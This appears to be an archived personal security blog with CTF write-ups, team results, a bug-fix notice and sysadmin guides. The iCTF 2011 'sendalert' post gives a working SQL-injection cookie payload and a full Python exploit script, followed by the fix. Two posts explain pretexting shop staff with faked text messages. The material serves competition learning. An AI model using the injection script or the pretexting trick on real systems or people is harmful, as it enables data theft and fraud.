Sqall Blog

PlaidCtf 2012 write up - Torrent (200)

nospam@example.com (sqall) — Mon, 30 Apr 2012 09:19:55 +0200

The "Torrent" challenge in the PlaidCTF 2012:

It turns out that robots, like humans, are cheap and do not like paying for their movies and music. We were able to intercept some torrent downloads but are unsure what the file being downloaded was. Can you figure it out?

All you got was a pcap dump file with torrent data traffic. With a little bit google searching and tshark we could extract the data.

tshark -r torrent.pcap -R 'bittorrent.piece.data and ip.dst_host == 128.237.112.101' -T fields -e bittorrent.piece.index -e bittorrent.piece.begin -e bittorrent.piece.data -E separator=_ > dump.txt

The dump.txt looks like the following: INDEX_PIECEBEGIN_DATA. The data was stored as HEX values separated via ":". Now some dirty ctf python coding was doing the trick and gave us the transferred file:

from operator import itemgetter
import binascii

content = []
with open('dump.txt', 'r') as f:
for line in f:
idx, begin, data = line.strip().split('_')
content.append([int(idx[2:], 16),int(begin, 16), data.replace(":","")])

content = sorted(content, key = itemgetter(0))

result = ""
i=0
while i < len(content):
if content[i][1] == 0:
result += content[i][2]
result += content[i+1][2]
else:
result += content[i+1][2]
result += content[i][2]
i += 2

print binascii.unhexlify(result)

We executed the script and saved the output in a file. The "file" command showed us, that this file was a bzipped file:

sqall@pctf:~/Desktop/pctf/Torrents/content file result
result: bzip2 compressed data, block size = 900k

Unzipping it revealed a key.txt and a key.mp3. In the key.txt was the key (I loled when I read this ):

t0renz0_v0n_m4tt3rh0rn

PlaidCTF 2012: FluxFingers 6th place of over 700 teams

nospam@example.com (sqall) — Mon, 30 Apr 2012 09:01:36 +0200

This weekend the FluxFingers and I we were participating in the PlaidCTF 2012. We played this CTF for 48h and finally we got the 6th place (of over 700 teams). Thanks to the organizers for such a nice CTF with a lot of good challenges. Unfortunately the great idea with a browser RPG didn't use it full potential. Perhaps next year. Thanks again

openvpn-auth-ldap STARTTLS and authentication bug finally fixed

nospam@example.com (sqall) — Wed, 22 Feb 2012 09:34:48 +0100

Over a year ago I found a bug in the openvpn-auth-ldap module (bug report and patch for debian here and an explanation on my blog in german here).

Yesterday I got an eMail that this bug report is now fixed and closed.

We believe that the bug you reported is fixed in the latest version of
openvpn-auth-ldap, which is due to be installed in the Debian FTP archive:

openvpn-auth-ldap_2.0.3-2.debian.tar.gz
to main/o/openvpn-auth-ldap/openvpn-auth-ldap_2.0.3-2.debian.tar.gz
openvpn-auth-ldap_2.0.3-2.dsc
to main/o/openvpn-auth-ldap/openvpn-auth-ldap_2.0.3-2.dsc
openvpn-auth-ldap_2.0.3-2_i386.deb
to main/o/openvpn-auth-ldap/openvpn-auth-ldap_2.0.3-2_i386.deb

A summary of the changes between this version and the previous one is
attached.

[...]

Changes:
openvpn-auth-ldap (2.0.3-2) unstable; urgency=low
.
- Acknowledge Matthias Klose's NMU for #625146.
- patched/STARTTLS_before_auth.patch: Run STARTTLS before authenticatingi
to the LDAP server. Thanks Andre Pawlowski for finding this and the fix.
(Closes: #610339)
- debian/control: added Homepage field, added autotools-dev Build-Dep
- Added debian/source/format
- Added debian/watch
[...]

I have to say, it took a long time and I'm already forgot about the report (because I used a self compiled version of it with the fix). But I'm glad it's finally fixed, because I saw this module in a lot of environments used and the admins I talked to didn't know about this behavior of this module (and never would find out because they allowed anonymous access to their OpenLDAP system).

Challenge: MozillaCTF 2012 IP Panel (250)

nospam@example.com (sqall) — Sun, 12 Feb 2012 13:48:33 +0100

Some weeks ago you were able to play the MozillaCTF 2012. Some FluxFingers helped to organize it and so I wrote a web challenge for it. I don't know if the challenges are still available and playable and so I decided to publish this challenge here. Because this website is obviously vulnerable you have to download and set it up for yourself.

When you unzip the archive, you get three files. Copy these files into a directory under your webroot and then you are ready to go!

Notice that this web challenge has some rules:
- don't look in the source code (this challenge should be solved without knowing the source)
- the flag file and parser.sh are not directly accessible (originally the webserver denies any attempt to open these files directly with your browser)

Have fun

Exploit Mozillas IP Panel! This IP Panel is used for whitelisting IP addresses. We know that the webinterface will call a bash script that will execute an iptables command without validation. Find the flag and submit it!

A write-up for this challenge can be found here.

Challenge: hack.lu CTF 2011 Spy Aboard! (300)

nospam@example.com (sqall) — Sun, 12 Feb 2012 13:25:57 +0100

Last year the FluxFingers organized the hack.lu 2011 CTF. Some weeks ago I read an eMail on the FluxFingers eMail account, that the server with all challenges is down.

I don't know if we find a mirror, where we can set up a VM for all challenges, so I would like to publish my challenge for this CTF here. Notice that this was the first time I wrote a challenge for a CTF and the first time I coded something with python. Therefore, the code isn't such a beauty

Spy aboard!
We have a spy aboard! Around 5 minutes ago we intercepted an encrypted transmission to an enemy outpost. It seems like we interrupted the mole in the act because
we found an open transmission program on our terminals. We are 100% sure that he sent the position of our fleet to the outpost to plan an attack against us. Our position
at the time of the transmission was:

position: Harcon System , Planet Crematoria , x: 129.23432231423 degrees y: 111.13442353423 degrees , z: 100,13142234423 degrees

We need the spies authorization code to prevent this attack. You as our crypto expert you have to find it! The survival of 10000 brave men, women and children depends on you!!!
GOOD LUCK!

download challenge here

A write-up for this challenge can be found on the website of Leet More.

ictf 2011 - write up sendalert

nospam@example.com (sqall) — Sat, 17 Dec 2011 18:33:52 +0100

I know. It's a little bit late. But our team have to write these write ups for the ictf2011 organizers and I wrote it today for the sendalert service.

The service sendalert was a python webservice running on port 11111 which does …ahm ... seriously I don't know. The service got a login form and the game server constantly created new users. It uses a sqlite database which was located under “/home/sendalert/database”. The gameserver saved the flags in this database in the table “users” in the column “data”. The program used prepared sql statements for all but one query. This query was vulnerable for a sql injection. The python code for this query was in the “status” section:

cur.execute("""select username, data from users where session='%s'""" % session)

The problem with this query was, that the same session have to be saved in the database before you can use it to exploit the service. So first of all we need a registered user. When we register a user we can see in the python code that the service will give us the fix session “-”.

session = "-"
cur.execute("""insert into users (username, password, session) values (?,?,?);""", (username, password, session))

Now we have to find a way to change this session value. The only update query that alters the session lies in the depth of the login mechanism.

session = self.auth()
if session == None or session == "" or session == "-" or session == "None":
cookie = self.headers.getheaders('Cookie')
if cookie != None and len(cookie) != 0:
session = None
morsels = cookie[0].split(";");
self.logger.debug("Parsed cookie: %s" % str(morsels))
for m in morsels:
(var, val) = m.strip().split('=')
if var == self.cookie_name:
session = val
break;
else:
self.logger.debug("Session is missing, creating one (%s)" % str(session))
md5 = hashlib.md5()
md5.update(str(time.time()) + username + password + self.secret)
session = md5.hexdigest()
[...]
cur.execute("""update users set session=? where username=? and password=?""", (session, username, password))

Here we can see that if we log in with a valid user-password pair the service will read the “Cookie” value from our request and if it is set, it will change the session in the database to this value. If it is not set, a md5 hash will be generated for the session. The only thing we have to circumvent is the split for “=”.

So finally we create a user and log in. Before we log in we set our “Cookie” value to:

alertsession=' or 1<>2 order by data desc ---

(“alertsession=” is used by the service as a prefix in every session). Now we have changed our session value in the database to

alertsession=' or 1<>2 order by data desc ---

and we can exploit the service.

When we now request the page “status” from the web server with our cookie we inject the sql query mentioned in the beginning of this write up. The query will look like

select username, data from users where session='alertsession=' or 1<>2 order by data desc ---'

and finally we got the newest flag written on the web site.

A python script that will do all the magic for us looks like:

#!/usr/bin/python

import httplib
import urllib
import sys

ip = sys.argv[1]

#http://10.13.187.3:11111/status
host = "%s:11111" % ip
cookie = "alertsession=' or 1<>2 order by data desc ---"

try:
#username=fluxfingers&password=fluxfingersRules&submit=Register
params = urllib.urlencode({'username': 'fluxfingers', 'password': 'fluxfingersRules', 'submit': 'Register'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(host)
conn.request("POST", "/register", params, headers)
response = conn.getresponse()

params = urllib.urlencode({'username': 'fluxfingers', 'password': 'fluxfingersRules', 'submit': 'Login'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": cookie}
conn = httplib.HTTPConnection(host)
conn.request("POST", "/login", params, headers)
response = conn.getresponse()

headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": cookie}
params = ""
conn = httplib.HTTPConnection(host)
conn.request("GET", "/status", params, headers)
response = conn.getresponse()
data = response.read()
except:
sys.exit(0)

positionstart = data.find("Subject: ")
positionend = data.find("
",positionstart)
print data[positionstart+9:positionend]

conn.close()

To fix this issue you just have to change the line

cur.execute("""select username, data from users where session='%s'""" % session)

cur.execute("""select username, data from users where session=?""" , (session, ))

Now it uses prepared statements like the other queries.

iCTF 2011 - FluxFingers 3rd place

nospam@example.com (sqall) — Sat, 03 Dec 2011 12:26:34 +0100

Yesterday my team and I made the 3rd place at the iCTF 2011. This time it was a real complicated CTF about money laundry, with really complicated rules. In the week before the ctf starts, some of us worked real hard to code a riskmanager program, that will decide how to use the flags and submit it. Until 4h before the ctf ends, it didn't work and we were on places around 40th. But finally we ended up on the 3rd place

Congrats More Smoked Leet Chicken (2nd) and We_0wn_Y0u (1st). Thanks to the iCTF team for this (sometimes really frustrating) ctf.

And last but not least, our thanks goes to the US government, which makes this ctf the first ctf with healthy meal

FluxFingers made the 2nd place at RuCTFE 2011

nospam@example.com (sqall) — Sun, 20 Nov 2011 11:34:12 +0100

Yesterday my team and I participate in the RuCTFE 2011. We made the 2nd place (like last year). Congrats to 0ldEur0pe that made the 1st place (also like last year). It was frustrating to see how 0ldEur0pe slowly but steady caught us up in the end of the CTF

Thanks goes to the RuCTFE team that made again a very good CTF (RuCTFE is always one of my favorites and I can't wait to RuCTFE 2012 ). It was a lot of fun and once again we learned a lot. Thank you!

quick guide: replacing failed hdd in linux software raid

nospam@example.com (sqall) — Thu, 20 Oct 2011 21:32:51 +0200

Today another type of data security.

One day ago a HDD failed in my software RAID 1 system. Today I replaced it and here is a quick guide for doing it:

1. locating defect HDD:

okean0s:/home/sqall# cat /proc/mdstat
md1 : active raid1 sda[0] sdb[2](F)
244198464 blocks [2/1] [U_]

---

2. getting serial number:

okean0s:/home/sqall# smartctl -i /dev/sdb
smartctl 5.40 2010-07-12 r3124 [x86_64-unknown-linux-gnu] (local build)
Copyright (C) 2002-10 by Bruce Allen, http://smartmontools.sourceforge.net

=== START OF INFORMATION SECTION ===
Model Family: Seagate Barracuda 7200.10 family
Device Model: ST3250620A
Serial Number: xxxxxxxx
Firmware Version: 3.AAE
User Capacity: 250,059,350,016 bytes
Device is: In smartctl database [for details use: -P show]
ATA Version is: 7
ATA Standard is: Exact ATA specification draft version not indicated
Local Time is: Thu Oct 20 21:25:40 2011 CEST
SMART support is: Available - device has SMART capability.
SMART support is: Enabled

---

3. fail the HDD in RAID Array:

okean0s:/home/sqall# mdadm --manage /dev/md1 --fail /dev/sdb

---

4. remove the HDD from RAID Array:

okean0s:/home/sqall# mdadm --manage /dev/md1 --remove /dev/sdb

---

5. now shutdown the server and physical remove the HDD and replace it with a new HDD

---

6. add HDD to the RAID Array:

okean0s:/mnt# mdadm --manage /dev/md1 --add /dev/sdb

---

7. verify state:

okean0s:/mnt# cat /proc/mdstat
Personalities : [raid1] [raid6] [raid5] [raid4]
md1 : active raid1 sdb[2] sda[0]
244198464 blocks [2/1] [U_]
[>....................] recovery = 0.2% (673344/244198464) finish=90.4min speed=44889K/sec

I found this guide on the web (it's exactly the same as my quick guide) and the author has partitions on the HDDs. So here I like to quote him:

Adding the new disk to the RAID Array:
Now that the new hard drive has been physically installed we can add it to the RAID Array.
In order to use the new drive we must create the exact same partition table structure that was on the old drive.
We can use the existing drive and mirror its partition table structure to the new drive. There is an easy command to do this:

sfdisk -d /dev/sda | sfdisk /dev/sdb

* Note that sometimes when removing drives and replacing them the drives device name may change. Make sure the drive you replaced is listed as /dev/sdb, by issueing command "fdisk -l /dev/sdb" and no partitions exist.

social engineering - the 2nd practical example

nospam@example.com (sqall) — Sat, 15 Oct 2011 23:00:30 +0200

Last Friday I had my next practical social engineering event. But before I start here a short info why it came to this situation.

I worked for three years as a sysadmin at an university in the german state NRW. Therefore I was paid by the LBV ("Landesamt für Besoldung und Versorgung") like every employee for the state NRW. And everyone I know who is paid by the LBV has a story in which they had problems with an incompetent LBV employee. Perhaps it's not always the employee, just the bureaucracy, but EVERYONE who has something to do with the LBV knows what I mean. Now I study IT-security at another university in NRW and got an offer for an sysadmin job at this university. Well, studying is expensive and so I take this job. When I quit my old job a year ago, the LBV didn't send me all my documents back I now needed for the new job (the important one was a document for the taxes). Now a logical mind would say: "Hey, the LBV has the documents from your old job, why can't they use these documents for the new one?". Well, I said something like that. But the truth is, they must send me the documents back and my new employer will send them back to the LBV. And the problem is: the LBV works very slow and the time is short in this case.

Therefore I was on my way to the tax office to get a replacement for the document for the taxes. After I was in two offices talking to some very impolite employees about my problem I went to the third and last one. I was a little bit angry for this impoliteness and thought about how I can handle the next employee without getting this rude behavior. I thought about "killing them with kindness" (a very easy and cool method my girlfriend mastered... really, she is a master in manipulate others with her kindness. She does it unconsciously, but she does.) but I tried this at the two employees before and it doesn't work well for me (it seems like every employee at an office that is run by the state hates their jobs). I thought about: "How can I get the employee in the last office put himself in my position?". And the solution was very simple and very effective. The solution (and the problem ) was the LBV.

So I told the employee (it was a middle-aged woman) about my problem and at the end I added: "... but you know the LBV. I think you had problems with the LBV yourself.". She starts to smile and I know I got her. She told me some stories about her and the LBV and I told her some of my stories. From here, it took only 2 minutes and I had the replacement for the document.

So what do we learn here?

First of all: "Never underestimate the effect of the kindness of your girlfriend"
Second: "State Offices suck!"
And the last one: "Kindness and to get the other put her/himself in your position will work for your benefits"

4th place at rwthctf 2011

nospam@example.com (sqall) — Sun, 02 Oct 2011 15:27:25 +0200

Our team made the 4th place at the rwthctf. Congratulations to FAUST, De Eindbazen and Leet More. Thanks goes to 0ldEur0pe for this ctf. It was a lot of fun (and a lot of frustration) this night.

I'm looking forward to read some write ups, so I finally understand how to crack this god damn crypto roulette!

social engineering - a practical example

nospam@example.com (sqall) — Thu, 22 Sep 2011 21:09:00 +0200

Do you know these photobook services, where you can create your own photobook online and let it be sent to a local store? Well, my girlfriend has used this service a week ago and the photobook was sent to a local store (a german chain of stores called DM). I was in the city and she texted me her costumer and job number. When I was at the store I searched through all the packets of photobooks and finally find hers. On the package her name, her job number and her costumer number was written. I went to the cashier and wanted to pay for it when she asks me to show her the order form.

What now? I didn't want to go home and get the form for her so I have to try it with some discussing

I told her polite and friendly that this photobook is obviously not for me but for my girlfriend and she is away from town for the next two weeks and she texted me her costumer and job number so I get it for her. I showed the cashier the text message on my mobile phone with the name of my girlfriend on the top and she sold me the photobook.

Well I didn't lie with the "my girlfriend is away from town the next two weeks" thing but the order form was lying on my desk at home.

This is a great practical example for social engineering. The names, job and costumer numbers were written on the packages of the photobooks. I could grab any of them, send myself a text message on my mobile phone and change the addressbook entry with my own number to the name on the photobook. Then I can say something like this to the cashier "This photobook isn't for me. My brother sent me his costumer and job number so I can get it for him." and show him the text message. I would say 99% of the cashiers would sell you the package with the photobook.

The text message is a very important thing. I think that a lot of cashier wouldn't sell you the photobook without the text message. It's a little bit like Chrisopher Hadnagy has written in his book "Social Engineering - The Art Of Human Exploiting". He wrote a great story with a business card in it and that it's easier to make other people believe you when have something written that supports your story. In his case I think it was a TSA employee that let him pass the security check with his IT stuff because he had shown a business card that said that he is an IT security auditor.

What do we learn through these stories? You should always have a business card with you that tells people who you are (or who you wanted to be ) and never order photobooks with really private stuff in it

Idea: Replication service for IPs to block

nospam@example.com (sqall) — Mon, 12 Sep 2011 19:39:29 +0200

The only thing that's keeping me working in this exam phase at the moment is this picture.

... but now the interesting stuff and not about me

On the rides by train I used the time to relax and code a little bit. Some months ago I had an idea about an decentralized Client/Server model which exchanges data of IP-addresses which should be blocked by the server. It's like the spamhaus block lists for eMail servers, only that they should be replicated over the network without any master. The principle is like Microsoft's Active Directory.

The whole idea came when I was rewriting this spam IP blocking script (article is in german). Some friends of mine who are administrating servers used it for finding and blocking spam sending hosts. Some of their servers has a lot of more spam eMail traffic and so they got a great anti spam list in no time. We exchange our blocking lists and the amount of incoming spam was going down. Then I ask myself "wouldn't it be great when our servers do this by their selves?". And the answer is "yes, it would" . So I thought about how it could be done and I realized that no one of us would give the others the master service, when it was written in a normal client/server model. But a replication service in which every of our hosts are trusted and every host has the same rights, that would be something else.

The IP-addresses to block could perhaps be created by scripts like the spam IP blocking script I mentioned before. Something like the ossec project uses to get the IPs to block. Yet I haven't finished any details about how it works. I've only written the basic threaded TCP Server in python so far. But I'm grateful for any idea and help I can get

CTF Team FluxFingers won the dCTF 2011

nospam@example.com (sqall) — Thu, 07 Jul 2011 19:21:28 +0200

Today the CTF Team FluxFingers of the Ruhr Universität Bochum won the dCTF 2011.

Here is a link to the ranking and if the link doesn't work, I made a screenshot.

Congratulations to all members of the CTF Team FluxFingers.

Debian lenny -> squeeze upgrade (raid and openldap issue)

nospam@example.com (sqall) — Wed, 15 Jun 2011 15:36:58 +0200

Today something not security related:

I upgraded one of my servers at home from Debian lenny to Debian squeeze. I read a lot of stuff like "there are problems with the software raid with madm" and so on. And if you just do a

apt-get dist-upgrade

with squeeze sources for apt, it's possible that you kill your raid. So here is what worked for me:

1. install package "firmware-linux-nonfree" for missing firmware files in kernel
2. install new kernel
3. reboot with new kernel
4. do dist-upgrade.

I found this list in the debian bug reports under "should work" and it definitely worked fine for me.

I've got still one issue with openLDAP. The config file slapd.conf is depracticated with the new version and is now split into different files under slapd.d. The service only works if I comment this line out:

olcTLSCipherSuite: TLS_RSA_AES_256_CBC_SHA

The log tells me:

main: TLS init def ctx failed: -1

And google tells me nothing of interest. Gnutls supports this cipher (it worked fine with the old openLDAP version). I've tried the following parameters too:

olcTLSCipherSuite: +AES-256-CBC:+SHA1

and

olcTLSCipherSuite: +AES-128-CBC

With this the service starts but when a client tries to connect I get a:

conn=1023 fd=17 closed (TLS negotiation failure)

Only with an commented "olcTLSCipherSuite:" everything works fine. I will have to work on this one because I don't like the thought of using weak crypto (now we are at the security related stuff ) only because an option is not set right. I will update these post when I find the reason and fixed it.